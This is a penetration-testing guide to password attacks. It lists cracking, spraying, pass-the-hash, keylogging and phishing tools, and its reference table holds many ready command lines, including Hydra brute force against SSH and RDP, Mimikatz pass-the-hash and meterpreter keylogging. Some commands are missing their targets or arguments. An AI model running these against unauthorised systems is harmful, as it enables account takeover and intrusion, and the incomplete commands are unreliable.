# Password Attacks *** #### 1. **Introduction to Password Attacks** Password attacks aim to uncover valid credentials by exploiting weaknesses in password management, storage, or selection. Effective password attacks often rely on weak passwords, poor encryption practices, or unpatched systems. #### 2. **Common Types of Password Attacks** **a. Brute Force Attack** * **Description**: Attempts every possible combination of characters to guess the password. * **Tools**: Hydra, John the Ripper, Hashcat. * **Pros & Cons**: Effective for shorter passwords but time-consuming for complex ones. * **Command Example**: ```bash hydra -l user -P /path/to/wordlist.txt ssh ``` **b. Dictionary Attack** * **Description**: Uses a predefined list of likely passwords to attempt matches. * **Tools**: Hashcat, Medusa, John the Ripper. * **Pros & Cons**: Faster than brute force but limited by the quality of the dictionary. * **Resources for Wordlists**: * [SecLists on GitHub](https://github.com/danielmiessler/SecLists) * [Weakpass](https://weakpass.com/) **c. Hybrid Attack** * **Description**: Combines dictionary words with character variations, like appending numbers or symbols. * **Tools**: Hashcat with hybrid mode, John the Ripper. * **Pros & Cons**: Targets passwords that follow predictable patterns effectively. * **Command Example**: ```bash hashcat -a 6 -m /path/to/wordlist.txt ``` **d. Rainbow Table Attack** * **Description**: Uses precomputed tables of hashed passwords to quickly find matches. * **Tools**: Rainbow Crack, Ophcrack. * **Pros & Cons**: Very fast if the table matches the hashing algorithm but requires significant storage. * **Rainbow Table Resources**: * [Project RainbowCrack](http://project-rainbowcrack.com/) * [CrackStation](https://crackstation.net/) **e. Credential Stuffing** * **Description**: Reuses breached username-password pairs across multiple accounts. * **Tools**: Sentry MBA, Snipr, OpenBullet. * **Pros & Cons**: Effective against users who reuse passwords but limited by the availability of breached data. * **Resources for Credential Dumps**: * [Have I Been Pwned](https://haveibeenpwned.com/) * [Dehashed](https://www.dehashed.com/) **f. Password Spraying** * **Description**: Attempts a few common passwords across many accounts to avoid account lockouts. * **Tools**: CrackMapExec, Ruler, Spraying Toolkit. * **Pros & Cons**: Effective against organizations with weak password policies but can be detected by activity monitoring. *** #### 3. **Popular Password Hacking Tools** **a. John the Ripper** * **Description**: One of the most popular open-source password cracking tools. * **Capabilities**: Supports many hashing algorithms, custom rules, and has a wide range of cracking modes. * **Resources**: [John the Ripper Documentation](https://www.openwall.com/john/doc/) **b. Hashcat** * **Description**: A high-performance password cracker optimized for GPU processing. * **Capabilities**: Supports multiple attack modes and advanced rules. * **Resources**: [Hashcat Wiki](https://hashcat.net/wiki/) **c. Hydra** * **Description**: A fast network login cracker for numerous protocols (SSH, FTP, HTTP, etc.). * **Capabilities**: Brute-forcing and dictionary attacks across various protocols. * **Resources**: [Hydra GitHub Repository](https://github.com/vanhauser-thc/thc-hydra) **d. Medusa** * **Description**: A versatile brute-forcing tool that supports many protocols. * **Capabilities**: Known for its speed and flexibility. * **Resources**: [Medusa Documentation](https://github.com/jmk-foofus/medusa) **e. CrackMapExec** * **Description**: A Swiss Army knife for pentesters that supports spraying, brute-forcing, and exploitation. * **Capabilities**: Integrated with Metasploit for extensive password attacks on Windows. * **Resources**: [CrackMapExec GitHub](https://github.com/byt3bl33d3r/CrackMapExec) **f. Ophcrack** * **Description**: Uses rainbow tables for cracking Windows LM and NTLM hashes. * **Capabilities**: Specialized in Windows passwords. * **Resources**: [Ophcrack Official Site](https://ophcrack.sourceforge.io/) *** #### 4. **Specialized Password Attack Techniques** **a. Man-in-the-Middle (MitM) Attacks** * **Description**: Intercepts passwords as they travel over the network. * **Tools**: Ettercap, MITMf, Bettercap. * **Resources**: [Bettercap Documentation](https://bettercap.org/) **b. Pass-the-Hash** * **Description**: Uses hashed passwords to authenticate without cracking them. * **Tools**: Mimikatz, Pass-the-Hash Toolkit. * **Resources**: [Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz) **c. Keylogging and Malware** * **Description**: Captures keystrokes to retrieve passwords directly from user input. * **Tools**: Metasploit (keylogger payloads), Cobalt Strike. * **Pros & Cons**: Effective, but requires malware delivery and installation. **d. Phishing and Social Engineering** * **Description**: Tricking users into revealing their passwords via fake login pages or deceptive requests. * **Tools**: Gophish, SET (Social Engineering Toolkit). * **Resources**: [Gophish GitHub](https://github.com/gophish/gophish) *** #### 5. **Hash Cracking Techniques and Tools** **a. NTLM and LM Hash Cracking** * **Tools**: Cain and Abel, Ophcrack. * **Command Example**: ```bash john --format=NT hashfile ``` **b. SHA-1 and SHA-256 Cracking** * **Tools**: Hashcat, John the Ripper. * **Command Example**: ```bash hashcat -m 100 hashfile /path/to/wordlist.txt ``` **c. PBKDF2 and bcrypt Cracking** * **Tools**: Hashcat, JtR. * **Resources**: [Hashcat Hash Modes](https://hashcat.net/wiki/doku.php?id=example_hashes) *** #### 6. **Guides and Resources for Further Learning** * **General Password Attack Guide**: [OWASP Password Attack Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) * **Understanding Hash Functions**: [NIST Guide to Cryptographic Hashes](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf) * **Advanced Cracking Techniques**: [Hashcat Advanced Cracking Techniques](https://hashcat.net/hashcat/) *** #### Conclusion This extensive look at password attacks illustrates the variety of tools and techniques available to an attacker and how each method can be mitigated with strong security practices. In practice, penetration testers should select methods based on target context, password strength, and network defenses. As password attacks continue to evolve, regularly reviewing and updating this knowledge with new tools and methods will ensure a strong foundation in penetration testing and cybersecurity. Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools. | **Attack Vector** | **Primary Tool** | **Example Usage** | | --------------------------------- | ----------------------------- | -------------------------------------------------------------------------------- | | Brute Force | Hydra | `hydra -l user -P /path/to/wordlist.txt ssh` | | Dictionary Attack | John the Ripper | `john --wordlist=/path/to/wordlist.txt hashfile` | | Hybrid Attack | Hashcat | `hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt` | | Rainbow Table Attack | Ophcrack | `ophcrack -t rainbow-table-file hashfile` | | Credential Stuffing | Snipr | Uses breach lists for multi-account testing | | Password Spraying | CrackMapExec | `crackmapexec smb -u users.txt -p common-passwords.txt` | | Keylogging Attack | Metasploit | `meterpreter > keyscan_start` | | Phishing | Gophish | Set up phishing campaign targeting email credentials | | Pass-the-Hash | Mimikatz | `sekurlsa::pth /user:Admin /domain:domain /ntlm: /run:powershell.exe` | | Hash Cracking (NTLM) | Hashcat | `hashcat -m 1000 hashfile /path/to/wordlist.txt` | | Hash Cracking (bcrypt) | John the Ripper | `john --format=bcrypt hashfile` | | LM Hash Cracking | Cain and Abel | Load hashes and run automated cracking | | SSH Brute Force | Hydra | `hydra -l root -P passwords.txt ssh://` | | HTTP Basic Auth Brute Force | Medusa | `medusa -h -U users.txt -P passwords.txt -M http` | | FTP Brute Force | Hydra | `hydra -l anonymous -P passwords.txt ftp://` | | SMB Password Attack | CrackMapExec | `crackmapexec smb -u admin -p passwords.txt` | | SQL Database Password Cracking | SQLMap | `sqlmap -u --crack --passwords` | | WPA2 Wi-Fi Cracking | aircrack-ng | `aircrack-ng -w /path/to/wordlist.txt ` | | Email Phishing with Spoofed Links | SET (Social-Engineer Toolkit) | Phishing module setup targeting email collection | | Reverse Brute Force | Hydra | `hydra -L usernames.txt -p commonpassword ssh` | | Multi-Protocol Password Testing | Medusa | Supports SMB, HTTP, FTP, Telnet, etc. | | Telnet Brute Force | Hydra | `hydra -l root -P passwords.txt telnet://` | | RDP Brute Force | Hydra | `hydra -l Administrator -P passwords.txt rdp://` | | Cisco Router Cracking | Ncrack | `ncrack -p 23 --user root --pass passwords.txt ` | | DNS Zone Transfer Attempt | nslookup | `nslookup -type=any -query=AXFR ` | | LDAP Password Attack | Medusa | `medusa -h -u user -P passwords.txt -M ldap` | | Telnet Credential Guessing | Hydra | `hydra -l admin -P passwords.txt telnet://` | | SNMP Community String Brute Force | Onesixtyone | `onesixtyone -c community-strings.txt ` | | OpenVPN Brute Force | Hydra | `hydra -l user -P passwords.txt openvpn://` | | Apache Tomcat Manager Brute Force | Hydra | `hydra -l admin -P passwords.txt http-get://:8080/manager/html` | | XMPP Brute Force | Hydra | `hydra -l user -P passwords.txt xmpp://` | | SIP/VoIP Credential Guessing | Svmap | Scans for SIP servers and attempts weak password logins | | Oracle DB Password Attack | ODAT | `odat passwordguesser -s -U usernames.txt -P passwords.txt` | | MSSQL Password Cracking | Hydra | `hydra -l sa -P passwords.txt mssql://` | | Kerberos TGT Brute Forcing | Kerbrute | `kerbrute bruteuser -d domain.com users.txt` | | RADIUS Brute Force | Medusa | `medusa -h -u user -P passwords.txt -M radius` | | MongoDB Password Attack | Hydra | `hydra -l user -P passwords.txt mongodb://` | | Redis Unauthorized Access Check | Nmap | `nmap -p 6379 --script redis-brute ` | | MacOS Keychain Exploit | Metasploit | Post-exploitation module in meterpreter for keychain access | | VNC Password Brute Force | Hydra | `hydra -P passwords.txt vnc://` | | VoIP/SIP Password Cracking | Hydra | `hydra -L users.txt -P passwords.txt sip://` | | Bitcoin Wallet Brute Force | btcrecover | Uses known wallet details to attempt password recovery | | Azure AD Password Spraying | MSOLSpray | `python3 MSOLSpray.py -u users.txt -p Password123` | | Office365 Credential Testing | AADInternals | Uses PowerShell to enumerate and test credentials | | ZIP File Password Cracking | fcrackzip | `fcrackzip -u -D -p /path/to/wordlist.txt ` | | PDF Password Cracking | pdfcrack | `pdfcrack -f -w /path/to/wordlist.txt` | | RAR File Password Cracking | RarCrack | `rarcrack --type rar --dictionary /path/to/wordlist.txt` | | Network Share Password Cracking | CrackMapExec | `crackmapexec smb -u usernames.txt -p passwords.txt` | *** This table should give a thorough understanding of various password attack vectors, tools, and sample commands to use. For each method, there are nuances to configurations and optimizations, so consulting tool-specific documentation and adjusting commands to your target environment can maximize effectiveness. ***